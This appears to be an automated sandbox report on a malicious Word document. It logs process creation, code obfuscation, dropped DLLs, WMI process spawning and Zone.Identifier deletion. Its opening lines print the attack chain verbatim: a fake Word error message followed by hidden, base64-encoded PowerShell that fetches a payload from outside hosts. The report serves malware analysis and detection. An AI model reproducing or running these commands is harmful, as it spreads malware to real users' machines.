Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
PE file contains an invalid checksum
Source: E6_R.dll.5.dr Static PE information: real checksum: 0x5c618 should be: 0x5db58
PE file contains sections with non-standard names
Source: E6_R.dll.5.dr Static PE information: section name: .text4
Source: E6_R.dll.5.dr Static PE information: section name: .text8
Source: E6_R.dll.5.dr Static PE information: section name: .text7
Source: E6_R.dll.5.dr Static PE information: section name: .text6
Source: E6_R.dll.5.dr Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022FED0 push edx; ret 7_2_0022FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00211155 push ecx; ret 7_2_00211156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002121EC pushad ; ret 7_2_00212200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00213391 push eax; iretd 7_2_002133AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00210C18 pushfd ; retf 7_2_00210C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002117A1 push ds; iretd 7_2_002117A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0028FED0 push edx; ret 8_2_0028FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00271155 push ecx; ret 8_2_00271156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002721EC pushad ; ret 8_2_00272200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00273391 push eax; iretd 8_2_002733AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00270C18 pushfd ; retf 8_2_00270C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002717A1 push ds; iretd 8_2_002717A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0014FED0 push edx; ret 9_2_0014FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00131155 push ecx; ret 9_2_00131156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001321EC pushad ; ret 9_2_00132200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00133391 push eax; iretd 9_2_001333AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00130C18 pushfd ; retf 9_2_00130C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001317A1 push ds; iretd 9_2_001317A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0019FED0 push edx; ret 10_2_0019FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00181155 push ecx; ret 10_2_00181156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001821EC pushad ; ret 10_2_00182200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00183391 push eax; iretd 10_2_001833AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00180C18 pushfd ; retf 10_2_00180C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001817A1 push ds; iretd 10_2_001817A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CFED0 push edx; ret 11_2_001CFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B1155 push ecx; ret 11_2_001B1156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B21EC pushad ; ret 11_2_001B2200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B3391 push eax; iretd 11_2_001B33AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B0C18 pushfd ; retf 11_2_001B0C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B17A1 push ds; iretd 11_2_001B17A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0011FED0 push edx; ret 12_2_0011FFD4

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Dgmlr\ngcj.eda Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Dgmlr\ngcj.eda:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
